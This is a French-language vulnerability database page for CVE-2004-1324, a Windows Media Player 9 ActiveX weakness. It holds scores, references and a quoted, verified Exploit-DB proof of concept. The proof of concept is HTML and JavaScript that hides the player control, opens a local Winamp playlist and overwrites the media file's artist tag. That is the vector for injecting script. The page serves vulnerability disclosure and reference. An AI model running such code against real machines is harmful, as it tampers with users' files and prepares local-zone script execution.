CVE-2004-1324 : Détail

CVE-2004-1324

6.85%V3
Network
2005-01-06
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 25031

Date de publication : 2004-12-17 23h00 +00:00
Auteur : Arman Nayyeri
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/12031/info The Windows Media Player ActiveX control is prone to a security weakness. The issue is that the control may be abused by a Web page to change attributes of media files (such as MP3). An attacker can influence attributes such as the artist, song name, or album name. It is possible to exploit this weakness to inject malicious script code into these attributes. If this issue was combined with a vulnerability that could force Internet Explorer to interpret the injected script code, it may be possible to execute malicious script code in the Local Zone. Such an attack would lead to execution of arbitrary code on computers that do not have this Zone locked down. This issue is reported to affect Windows Media Player 9. It reportedly does not work on computers running Windows XP SP2 when the attack is executed from a remote source. This is likely due to additional browser security measures in Windows XP SP2. <object style="display:none;" classid="clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6" id="WindowsMediaPlayer"> <param name="autoStart" value="1"> <param name="url" value="file://c:\program files\winamp\winamp.m3u"> <param name="mute" value="1"> </object> <script> note = 'Look at yourself and find the mortality of your body'; setTimeout( function(){ if (WindowsMediaPlayer.currentMedia.sourceURL!='c:\\program files\\winamp\\winamp.m3u') { artist = WindowsMediaPlayer.currentMedia.getItemInfo("Artist"); title = WindowsMediaPlayer.currentMedia.getItemInfo("Title"); album = WindowsMediaPlayer.currentMedia.getItemInfo("Album"); texxt = ""; if (artist!=note) { if (artist!="") texxt='I like '+artist+'!\n'; if (title!="") texxt=texxt+'I think '+title+' is the best song'; if ((title!="")&&(album!="")) texxt=texxt+' from '; if (album!="") texxt=texxt+'My favorite album "'+album+'".\n'; else texxt=texxt+'.\n'; texxt=texxt+'I have it on my computer ('+WindowsMediaPlayer.currentMedia.sourceURL+'), I guess you have it too! ;)'; alert(texxt); } WindowsMediaPlayer.currentMedia.setItemInfo("Artist",note); alert('done!\nplay '+WindowsMediaPlayer.currentMedia.sourceURL+' by a player and take a look at artist name, it must be changed!'); WindowsMediaPlayer.controls.stop(); WindowsMediaPlayer.controls.play(); } else alert('Can\'t find winamp default playlist!\nMost probably the winamp is not installed in c:\\program files\\winamp directory.'); } ,2000); </script> </body></html>

Products Mentioned

Configuraton 0

Microsoft>>Windows_media_player >> Version 9

Références

http://marc.info/?l=bugtraq&m=110352518211306&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/12031
Tags : vdb-entry, x_refsource_BID